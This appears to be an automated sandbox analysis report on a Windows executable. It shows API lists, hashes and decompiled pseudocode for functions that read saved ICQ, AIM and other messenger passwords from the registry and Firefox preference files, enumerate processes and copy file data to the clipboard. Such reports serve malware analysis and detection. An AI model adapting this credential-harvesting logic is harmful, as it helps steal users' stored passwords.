                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressProc$HandleModule
                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                          • API String ID: 667068680-3953557276
                                          • Opcode ID: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                          • Instruction ID: 36442a69f5807846e20e8f789375593bd69b00a93b3bf86530e8c97bdb066b37
                                          • Opcode Fuzzy Hash: 2211e89b0737fecda3037a560225c9ed33993fa6787b657681e5e05db23e2a88
                                          • Instruction Fuzzy Hash: 46F01D39E00362DD97209B26BD40BE73EE5578DB80715803BE908D2264DBB894C38FAD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004100A4, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 117registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                          • memset.MSVCRT ref: 004100EA
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 00410117
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 00410144
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?), ref: 004101B2
                                          • LocalFree.KERNEL32(?), ref: 004101C5
                                          • RegCloseKey.ADVAPI32(?), ref: 004101D0
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                          • RegCloseKey.ADVAPI32(?), ref: 004101F8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          • API String ID: 551151806-1872227768
                                          • Opcode ID: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                          • Instruction ID: f68ec8314172e0547355e42bda77cc46fbcb66bc12c1f5db7d7ae7cb92940bd3
                                          • Opcode Fuzzy Hash: 20f5c7480319690d4c614e4d7b7dd4f29f763a09612276579ba8a91edcf23ce4
                                          • Instruction Fuzzy Hash: A141F5B2901119EFDB11DF95DC84EEFBBBCEF0C754F0040A6F905E2150EA359A949BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00405C4E, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 115libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E00405C4E(signed int _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				struct tagRECT _v68;
				void _v323;
				char _v324;
				intOrPtr _v4612;
				char _v8864;
				struct HWND__* _v10984;
				void* __ebx;
				_Unknown_base(*)()* _t75;
				void* _t78;
				struct HINSTANCE__* _t91;
				intOrPtr* _t99;
				signed int _t101;
				intOrPtr* _t106;
				intOrPtr _t107;
				void* _t109;
				void* _t110;

				0x414060();
				_v12 = 8;
				SetRect( &_v68, 1, 1, 1, 1);
				if(MapDialogRect( *(_a4 + 4),  &_v68) != 0) {
					_v12 = _v68.top << 2;
				}
				_v8 = _v8 & 0;
				_v32 = 0x3ed;
				_v28 = 0x3ef;
				_v24 = 0x3ee;
				_v20 = 0x3f0;
				asm("stosd");
				_v52 = 0xb02c;
				_v48 = 0xb090;
				_v44 = 0xb0f4;
				_v40 = 0xb158;
				asm("stosd");
				_t99 =  &_v8864;
				do {
					E00402AA8(_a4,  *((intOrPtr*)(_t109 + _v8 - 0x1c)));
					0x4134d0();
					_v8 = _v8 + 4;
					 *_t99 =  *((intOrPtr*)(_t109 + _v8 - 0x30));
					_t99 = _t99 + 0x854;
				} while (_v8 < 0x14);
				_v8 = _v8 & 0x00000000;
				do {
					_a4 = _a4 & 0x00000000;
					do {
						_t101 = _a4 * 0x854;
						_t106 = _t109 + _t101 - 0x2ae4;
						0x4135a8();
						if(_a4 == 0) {
							_v324 = 0;
							memset( &_v323, 0, 0xff);
							_push(E0040876F(_v8 + 0x515));
							sprintf( &_v324, "%s:");
							_t110 = _t110 + 0x18;
							SetWindowTextA(_v10984,  &_v324);
						}
						_t107 =  *_t106;
						_t91 = LoadLibraryA("shlwapi.dll");
						_t75 = GetProcAddress(_t91, "SHAutoComplete");
						if(_t75 != 0) {
							 *_t75(_t107, 0x10000001);
						}
						FreeLibrary(_t91);
						 *((intOrPtr*)(_t109 + _t101 - 0x229c)) =  *((intOrPtr*)(_t109 + _t101 - 0x229c)) + 1;
						_t78 = _v4612 + _v12;
						 *((intOrPtr*)(_t109 + _t101 - 0x22a0)) =  *((intOrPtr*)(_t109 + _t101 - 0x22a0)) + _t78;
						_a4 = _a4 + 1;
					} while (_a4 < 5);
					_v8 = _v8 + 1;
				} while (_v8 < 7);
				return _t78;
			}































                                          0x00405c56
                                          0x00405c66
                                          0x00405c6d
                                          0x00405c85
                                          0x00405c8d
                                          0x00405c8d
                                          0x00405c95
                                          0x00405c9b
                                          0x00405ca2
                                          0x00405ca9
                                          0x00405cb0
                                          0x00405cb7
                                          0x00405cbb
                                          0x00405cc2
                                          0x00405cc9
                                          0x00405cd0
                                          0x00405cd7
                                          0x00405cd8
                                          0x00405cde
                                          0x00405ce8
                                          0x00405cf5
                                          0x00405d01
                                          0x00405d05
                                          0x00405d07
                                          0x00405d0d
                                          0x00405d13
                                          0x00405d17
                                          0x00405d17
                                          0x00405d1b
                                          0x00405d1e
                                          0x00405d24
                                          0x00405d2b
                                          0x00405d34
                                          0x00405d44
                                          0x00405d4b
                                          0x00405d61
                                          0x00405d6e
                                          0x00405d73
                                          0x00405d83
                                          0x00405d83
                                          0x00405d89
                                          0x00405d96
                                          0x00405d9e
                                          0x00405da6
                                          0x00405dae
                                          0x00405dae
                                          0x00405db1
                                          0x00405db7
                                          0x00405dc7
                                          0x00405dd0
                                          0x00405dd2
                                          0x00405dd5
                                          0x00405ddf
                                          0x00405de2
                                          0x00405df0

                                          APIs
                                          • SetRect.USER32(?,00000001,00000001,00000001,00000001), ref: 00405C6D
                                          • MapDialogRect.USER32(?,?), ref: 00405C7D
                                          • memset.MSVCRT ref: 00405D4B
                                          • sprintf.MSVCRT ref: 00405D6E
                                          • SetWindowTextA.USER32(?,?), ref: 00405D83
                                          • LoadLibraryA.KERNEL32(shlwapi.dll,000003ED), ref: 00405D90
                                          • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 00405D9E
                                          • FreeLibrary.KERNEL32(00000000), ref: 00405DB1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: LibraryRect$AddressDialogFreeLoadProcTextWindowmemsetsprintf
                                          • String ID: %s:$SHAutoComplete$shlwapi.dll
                                          • API String ID: 2601263068-2802052640
                                          • Opcode ID: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                          • Instruction ID: b550a958d3f196041ff417ee8ca2f57d98087dd1caa8e181cbf0d69f42a088e7
                                          • Opcode Fuzzy Hash: ab2cf4164b993b72bb3261ad71969f56e00e3f563b2705c4529dda320590d4ba
                                          • Instruction Fuzzy Hash: D0410B71A00209EFDB11DF94DC496EEBBB8EF48309F10846AE905B7251D7789A858F54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411BA1, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 63librarystringloaderCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00000000,?,?,?,?,?,?,00404A50,?), ref: 00411BC1
                                          • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00411BD3
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,?,?,?,?,00404A50,?), ref: 00411BE9
                                          • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00411BF1
                                          • strlen.MSVCRT ref: 00411C15
                                          • strlen.MSVCRT ref: 00411C22
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AddressHandleModuleProcstrlen
                                          • String ID: GetProcAddress$LdrGetProcedureAddress$PJ@$kernel32.dll$ntdll.dll
                                          • API String ID: 1027343248-251837621
                                          • Opcode ID: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                          • Instruction ID: 714763e50c761412b950203b9ac78bff84e38b84e40515d0a0e54eee0800bd5e
                                          • Opcode Fuzzy Hash: 40cae4cbe57c70c2a3c50298ef219b0ade5f84c156f45a623d49dacd8ce400e8
                                          • Instruction Fuzzy Hash: D2113072D0021CBBCB11EFE5DC45ADEBBB9EF48310F114467E500B7250E7B99A408B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004121C1, Relevance: 19.3, APIs: 1, Strings: 10, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                          • API String ID: 714388716-318151290
                                          • Opcode ID: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                          • Instruction ID: ab6a2e7572a39428c533488b1ae62aae3229acca50d317451570c8424bb0716c
                                          • Opcode Fuzzy Hash: c17e53f9d18fe5fb2fd5576a7b5c65f59802a4f70eda24efbc6384e9d0c546b8
                                          • Instruction Fuzzy Hash: 52F0F931A986077039690628AF1EAFF0101A429B4577445D7A402E07D1C9FD8FF2A05F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040E293, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 167fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0040E293(void* __eflags, intOrPtr* _a4, int _a8) {
				void* _v8;
				char _v12;
				void* _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v284;
				char _v540;
				void _v1553;
				void _v1563;
				char _v1564;
				void _v2588;
				char _v3611;
				void _v3612;
				void* __ebx;
				void* __edi;
				void* _t52;
				int _t57;
				void* _t64;
				void* _t66;
				void* _t67;
				void* _t83;
				intOrPtr* _t88;
				intOrPtr _t105;
				char _t107;
				void* _t109;
				int _t113;
				long _t116;
				void* _t117;
				void* _t118;
				intOrPtr* _t119;
				void* _t120;

				_t52 = E004067BA(_a8);
				_pop(_t95);
				_v8 = _t52;
				if(_t52 != 0xffffffff) {
					_t116 = GetFileSize(_t52, 0);
					if(_t116 < 0x100000) {
						_t3 = _t116 + 1; // 0x1
						_t57 = _t3;
						0x413d5c();
						_t109 = _t57;
						 *_t119 = 0x3ff;
						_v16 = _t109;
						_v12 = 0;
						_v1564 = 0;
						memset( &_v1563, 0, _t57);
						_t120 = _t119 + 0xc;
						 *_t109 = 0;
						ReadFile(_v8, _t109, _t116,  &_v20, 0);
						 *((char*)(_t109 + _t116)) = 0;
						while(1) {
							_t64 = E00407193(_t109, _t95,  &_v1564, 0x3ff,  &_v12);
							_t120 = _t120 + 0xc;
							if(_t64 == 0) {
								break;
							}
							_t66 = E00407139(0, "user_pref("");
							_pop(_t95);
							if(_t66 == 0) {
								_push(0x417ddc);
								_t67 = 0xb;
								_t13 = E00407139(_t67) - 0xb; // -11
								_t95 = _t13;
								_a8 = _t95;
								if(_t95 > 0) {
									_t117 = E00407139(E00407139(_t68 + 1, 0x417de4) + 1, 0x417ddc);
									_pop(_t95);
									if(_t117 > 0) {
										_t17 = _t117 + 1; // 0x1
										_t113 = E00407139(_t17, 0x417ddc) - _t117 - 1;
										_pop(_t95);
										if(_t113 > 0) {
											memcpy( &_v2588,  &_v1553, _a8);
											 *((char*)(_t118 + _a8 - 0xa18)) = 0;
											memcpy( &_v3612, _t118 + _t117 - 0x617, _t113);
											_t95 =  &_v2588;
											 *((char*)(_t118 + _t113 - 0xe18)) = 0;
											_t83 = E00407139(0, ".aim.session.password");
											_t120 = _t120 + 0x1c;
											if(_t83 > 0) {
												 *((char*)(_t118 + _t83 - 0xa18)) = 0;
												_v540 = 0;
												_v284 = 0;
												_v28 = 0;
												_v24 = 0;
												E00406958(0xff,  &_v540,  &_v2588);
												E004029D9( &_v3611,  &_v284, 0xff);
												_t107 = _v540;
												_t105 = 2;
												_v28 = _t105;
												_t88 =  &_v540;
												while(_t107 != 0) {
													if(_t107 < 0x30 || _t107 > 0x39) {
														_v24 = _t105;
													} else {
														_t88 = _t88 + 1;
														_t107 =  *_t88;
														continue;
													}
													L15:
													_t95 = _a4;
													 *((intOrPtr*)( *_a4))( &_v540);
													goto L16;
												}
												_v24 = 3;
												goto L15;
											}
										}
									}
								}
							}
							L16:
							_t109 = _v16;
						}
						0x413d56(_t109);
					}
					CloseHandle(_v8);
				}
				return 1;
			}



































                                          0x0040e2a2
                                          0x0040e2aa
                                          0x0040e2ab
                                          0x0040e2ae
                                          0x0040e2be
                                          0x0040e2c6
                                          0x0040e2cc
                                          0x0040e2cc
                                          0x0040e2d0
                                          0x0040e2d5
                                          0x0040e2d7
                                          0x0040e2e6
                                          0x0040e2e9
                                          0x0040e2ec
                                          0x0040e2f2
                                          0x0040e2f7
                                          0x0040e304
                                          0x0040e306
                                          0x0040e30c
                                          0x0040e47a
                                          0x0040e48c
                                          0x0040e491
                                          0x0040e496
                                          0x00000000
                                          0x00000000
                                          0x0040e321
                                          0x0040e328
                                          0x0040e329
                                          0x0040e334
                                          0x0040e337
                                          0x0040e344
                                          0x0040e344
                                          0x0040e34b
                                          0x0040e34e
                                          0x0040e372
                                          0x0040e377
                                          0x0040e378
                                          0x0040e37e
                                          0x0040e391
                                          0x0040e394
                                          0x0040e395
                                          0x0040e3ac
                                          0x0040e3b4
                                          0x0040e3cb
                                          0x0040e3d7
                                          0x0040e3dd
                                          0x0040e3e4
                                          0x0040e3e9
                                          0x0040e3ee
                                          0x0040e3f4
                                          0x0040e401
                                          0x0040e407
                                          0x0040e40d
                                          0x0040e410
                                          0x0040e41f
                                          0x0040e431
                                          0x0040e436
                                          0x0040e440
                                          0x0040e441
                                          0x0040e444
                                          0x0040e459
                                          0x0040e44f
                                          0x0040e466
                                          0x0040e456
                                          0x0040e456
                                          0x0040e457
                                          0x00000000
                                          0x0040e457
                                          0x0040e469
                                          0x0040e469
                                          0x0040e475
                                          0x00000000
                                          0x0040e475
                                          0x0040e45d
                                          0x00000000
                                          0x0040e45d
                                          0x0040e3ee
                                          0x0040e395
                                          0x0040e378
                                          0x0040e34e
                                          0x0040e477
                                          0x0040e477
                                          0x0040e477
                                          0x0040e49d
                                          0x0040e4a2
                                          0x0040e4a6
                                          0x0040e4a6
                                          0x0040e4b3

                                          APIs
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040E2B8
                                          • ??2@YAPAXI@Z.MSVCRT ref: 0040E2D0
                                          • memset.MSVCRT ref: 0040E2F2
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040E306
                                          • memcpy.MSVCRT ref: 0040E3AC
                                          • memcpy.MSVCRT ref: 0040E3CB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E49D
                                          • CloseHandle.KERNEL32(?), ref: 0040E4A6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: File$memcpy$??2@??3@CloseCreateHandleReadSizememset
                                          • String ID: .aim.session.password$user_pref("
                                          • API String ID: 1009687194-2166142864
                                          • Opcode ID: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                          • Instruction ID: 9dacb5a7e7bcd3ea0486815f95980eeefdadcc55de365010cf028b87c9f312c9
                                          • Opcode Fuzzy Hash: dc577dbf4ddbf8b447914fb03024d9040712cde61aa19fb03e9770e00e26eb45
                                          • Instruction Fuzzy Hash: 2451167280410D9ECB10DF65DC85AEE7BB9AF44314F1404BFE445B7281EA385F98CB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D794, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 122registryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 35%
                                          			E0040D794(intOrPtr* _a4, void* _a8, intOrPtr _a12) {
				char _v12;
				int _v16;
				void* _v20;
				long _v24;
				int _v28;
				char _v44;
				void _v303;
				char _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				char _v568;
				char _v824;
				void _v1079;
				int _v1080;
				void* __ebx;
				void** _t45;
				char* _t49;
				long _t51;
				long _t55;
				long _t62;
				long _t68;
				int _t70;
				int _t76;
				void* _t78;
				void* _t79;
				void* _t80;
				void* _t81;

				_t45 =  &_a8;
				_v24 = 1;
				0x411d68(_a8, "Software\Mirabilis\ICQ\NewOwners", _t45);
				_t79 = _t78 + 0xc;
				if(_t45 == 0) {
					_t70 = 0;
					_v12 = 0;
					_v304 = 0;
					memset( &_v303, 0, 0xff);
					_t80 = _t79 + 0xc;
					_t49 =  &_v304;
					_push(_t49);
					_push(0);
					while(1) {
						0x411dee(_a8);
						_t81 = _t80 + 0xc;
						if(_t49 != 0) {
							break;
						}
						_t51 =  &_v304;
						0x411d68(_a8, _t51,  &_v20);
						_t80 = _t81 + 0xc;
						__eflags = _t51;
						if(_t51 != 0) {
							L10:
							_t38 =  &_v12;
							 *_t38 = _v12 + 1;
							__eflags =  *_t38;
							_t49 =  &_v304;
							_push(_t49);
							_push(_v12);
							continue;
						} else {
							_v16 = 0x10;
							_t55 = RegQueryValueExA(_v20, "MainLocation", _t70,  &_v28,  &_v44,  &_v16);
							__eflags = _t55;
							if(_t55 != 0) {
								L9:
								RegCloseKey(_v20);
								goto L10;
							} else {
								_t76 = atoi( &_v304);
								__eflags = _t76 - _t70;
								if(_t76 <= _t70) {
									goto L9;
								} else {
									__eflags = _v16 - 8;
									if(__eflags < 0) {
										goto L9;
									} else {
										_v1080 = _t70;
										memset( &_v1079, _t70, 0xff);
										_t80 = _t80 + 0xc;
										_t62 = E0040807D( &_v1080, __eflags, _t76, _a12,  &_v44, _v16);
										__eflags = _t62;
										if(_t62 == 0) {
											L8:
											_t70 = 0;
											__eflags = 0;
											goto L9;
										} else {
											_v824 = 0;
											_v568 = 0;
											_v312 = 0;
											_v308 = 0;
											0x413d0c( &_v568,  &_v1080);
											0x413d0c( &_v824,  &_v304);
											_t80 = _t80 + 0x10;
											_v308 = 3;
											_v312 = 8;
											_t68 =  *((intOrPtr*)( *_a4))( &_v824);
											__eflags = _t68;
											_v24 = _t68;
											if(_t68 != 0) {
												goto L8;
											}
										}
									}
								}
							}
						}
						break;
					}
					RegCloseKey(_a8);
				}
				return _v24;
			}






























                                          0x0040d7a0
                                          0x0040d7ac
                                          0x0040d7b3
                                          0x0040d7b8
                                          0x0040d7bd
                                          0x0040d7c3
                                          0x0040d7d3
                                          0x0040d7d6
                                          0x0040d7dc
                                          0x0040d7e1
                                          0x0040d7e4
                                          0x0040d7ea
                                          0x0040d7eb
                                          0x0040d90f
                                          0x0040d912
                                          0x0040d917
                                          0x0040d91c
                                          0x00000000
                                          0x00000000
                                          0x0040d7f5
                                          0x0040d7ff
                                          0x0040d804
                                          0x0040d807
                                          0x0040d809
                                          0x0040d902
                                          0x0040d902
                                          0x0040d902
                                          0x0040d902
                                          0x0040d905
                                          0x0040d90b
                                          0x0040d90c
                                          0x00000000
                                          0x0040d80f
                                          0x0040d824
                                          0x0040d82b
                                          0x0040d831
                                          0x0040d833
                                          0x0040d8f9
                                          0x0040d8fc
                                          0x00000000
                                          0x0040d839
                                          0x0040d845
                                          0x0040d847
                                          0x0040d84a
                                          0x00000000
                                          0x0040d850
                                          0x0040d850
                                          0x0040d854
                                          0x00000000
                                          0x0040d85a
                                          0x0040d863
                                          0x0040d869
                                          0x0040d86e
                                          0x0040d882
                                          0x0040d887
                                          0x0040d889
                                          0x0040d8f7
                                          0x0040d8f7
                                          0x0040d8f7
                                          0x00000000
                                          0x0040d88b
                                          0x0040d89b
                                          0x0040d8a1
                                          0x0040d8a7
                                          0x0040d8ad
                                          0x0040d8b3
                                          0x0040d8c6
                                          0x0040d8d0
                                          0x0040d8da
                                          0x0040d8e4
                                          0x0040d8ee
                                          0x0040d8f0
                                          0x0040d8f2
                                          0x0040d8f5
                                          0x00000000
                                          0x00000000
                                          0x0040d8f5
                                          0x0040d889
                                          0x0040d854
                                          0x0040d84a
                                          0x0040d833
                                          0x00000000
                                          0x0040d809
                                          0x0040d925
                                          0x0040d925
                                          0x0040d932

                                          APIs
                                            • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          • RegQueryValueExA.ADVAPI32(?,MainLocation,00000000,?,?,?), ref: 0040D82B
                                          • atoi.MSVCRT ref: 0040D840
                                          • memset.MSVCRT ref: 0040D869
                                          • _mbscpy.MSVCRT ref: 0040D8B3
                                          • _mbscpy.MSVCRT ref: 0040D8C6
                                          • RegCloseKey.ADVAPI32(?), ref: 0040D8FC
                                          • memset.MSVCRT ref: 0040D7DC
                                            • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                          • RegCloseKey.ADVAPI32(00000008), ref: 0040D925
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Close_mbscpymemset$EnumOpenQueryValueatoi
                                          • String ID: MainLocation$Software\Mirabilis\ICQ\NewOwners
                                          • API String ID: 2897902629-2277304809
                                          • Opcode ID: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                          • Instruction ID: e76a91e7ade9601acab1c04a0be11c20e8a13b6e7dda126cd817bcb1d0c6ed36
                                          • Opcode Fuzzy Hash: 849ad6949330c7bb5644b37c08c0bd6d76671fce4c5344370ab450b053ac0cd8
                                          • Instruction Fuzzy Hash: E841EFB2D0111DAEDF11EF95DC85ADEBBBCAF09304F4040AAE909E2151E7349B58CF64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411172, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strchr.MSVCRT ref: 0041118A
                                          • _mbscpy.MSVCRT ref: 00411198
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                            • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                            • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                          • _mbscpy.MSVCRT ref: 004111E8
                                          • _mbscat.MSVCRT ref: 004111F3
                                          • memset.MSVCRT ref: 004111CF
                                            • Part of subcall function 00406BC3: GetWindowsDirectoryA.KERNEL32(0041E458,00000104,?,00411228,00000000,?,00000000,00000104,00000000), ref: 00406BD8
                                            • Part of subcall function 00406BC3: _mbscpy.MSVCRT ref: 00406BE8
                                          • memset.MSVCRT ref: 00411217
                                          • memcpy.MSVCRT ref: 00411232
                                          • _mbscat.MSVCRT ref: 0041123D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                          • String ID: \systemroot
                                          • API String ID: 912701516-1821301763
                                          • Opcode ID: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                          • Instruction ID: 1deae77e6ad71c1ffcfab25ec4cb50ddae9004d97205ddf1ac571f940d5d67aa
                                          • Opcode Fuzzy Hash: 218f5e9704a1aeb6310374669f71ec2bdb1fcc002080e651c6f93d871d085d50
                                          • Instruction Fuzzy Hash: F921D77150820479EB60A7619C83FEBB7EC4F15709F10409FF789E10C1EAACABC5466A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004068B5, Relevance: 16.6, APIs: 11, Instructions: 58clipboardmemoryfileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004068B5(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				long _v8;
				void* _v12;
				long _v16;
				void* _t14;
				void* _t20;
				void* _t28;
				void* _t33;
				long _t35;

				_v8 = _v8 & 0x00000000;
				EmptyClipboard();
				_t14 = E004067BA(_a4);
				_v12 = _t14;
				if(_t14 == 0xffffffff) {
					_v8 = GetLastError();
				} else {
					_t35 = GetFileSize(_t14, 0);
					_t5 = _t35 + 1; // 0x1
					_t20 = GlobalAlloc(0x2000, _t5);
					_t28 = _t20;
					if(_t28 == 0) {
						L4:
						_v8 = GetLastError();
					} else {
						GlobalFix(_t28);
						_t33 = _t20;
						if(ReadFile(_v12, _t33, _t35,  &_v16, 0) == 0) {
							goto L4;
						} else {
							 *((char*)(_t33 + _t35)) = 0;
							GlobalUnWire(_t28);
							SetClipboardData(1, _t28);
						}
					}
					CloseHandle(_v12);
				}
				CloseClipboard();
				return _v8;
			}











                                          0x004068bb
                                          0x004068bf
                                          0x004068c8
                                          0x004068d1
                                          0x004068d4
                                          0x0040694a
                                          0x004068d6
                                          0x004068e2
                                          0x004068e4
                                          0x004068ed
                                          0x004068f3
                                          0x004068f7
                                          0x0040692d
                                          0x00406933
                                          0x004068f9
                                          0x004068fa
                                          0x00406902
                                          0x00406915
                                          0x00000000
                                          0x00406917
                                          0x00406918
                                          0x0040691c
                                          0x00406925
                                          0x00406925
                                          0x00406915
                                          0x00406939
                                          0x00406941
                                          0x0040694d
                                          0x00406957

                                          APIs
                                          • EmptyClipboard.USER32 ref: 004068BF
                                            • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004068DC
                                          • GlobalAlloc.KERNEL32(00002000,00000001), ref: 004068ED
                                          • GlobalFix.KERNEL32(00000000), ref: 004068FA
                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040690D
                                          • GlobalUnWire.KERNEL32(00000000), ref: 0040691C
                                          • SetClipboardData.USER32(00000001,00000000), ref: 00406925
                                          • GetLastError.KERNEL32 ref: 0040692D
                                          • CloseHandle.KERNEL32(?), ref: 00406939
                                          • GetLastError.KERNEL32 ref: 00406944
                                          • CloseClipboard.USER32 ref: 0040694D
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                                          • String ID:
                                          • API String ID: 2565263379-0
                                          • Opcode ID: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                          • Instruction ID: 43236b9afd726b755d45991aac83c0a8e3bcf6aaaa4f317cb2ebd178168b56f4
                                          • Opcode Fuzzy Hash: 7cc790b86ad5fb4f13c7b98d55ec42b7b78c1a001a2156659b5bb496b015d989
                                          • Instruction Fuzzy Hash: 07113D75904605FBD7116FA4AD4CBDE7FB8EB88325F108075F902E2290DB748944CA69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004088D4, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 19%
                                          			E004088D4(void* __ecx, int _a4, struct tagMENUITEMINFOA _a8, intOrPtr _a12, int _a24, intOrPtr _a28, char* _a44, int _a48, char _a56, void _a57, char _a4160, void _a4161) {
				char* _v0;
				int _v4;
				int _t38;
				char* _t48;
				void* _t50;
				void* _t57;
				int _t62;
				signed int _t68;
				signed int _t69;

				_t57 = __ecx;
				_t69 = _t68 & 0xfffffff8;
				0x414060();
				_t38 = GetMenuItemCount(_a8.cbSize);
				_a4 = _t38;
				_v4 = 0;
				if(_t38 <= 0) {
					L15:
					return _t38;
				} else {
					do {
						memset( &_a57, 0, 0x1000);
						_t69 = _t69 + 0xc;
						_a44 =  &_a56;
						_a8.cbSize = 0x30;
						_a12 = 0x36;
						_a48 = 0x1000;
						_a56 = 0;
						if(GetMenuItemInfoA(_a8.cbSize, _v4, 1,  &_a8) == 0) {
							goto L14;
						}
						if(_a56 == 0) {
							L12:
							if(_a28 != 0) {
								_push(0);
								_push(_a28);
								_push(_a4);
								E004088D4(_t57);
								_t69 = _t69 + 0xc;
							}
							goto L14;
						}
						_t62 = _a24;
						_a4160 = 0;
						memset( &_a4161, 0, 0x1000);
						_t48 = strchr( &_a56, 9);
						_t69 = _t69 + 0x14;
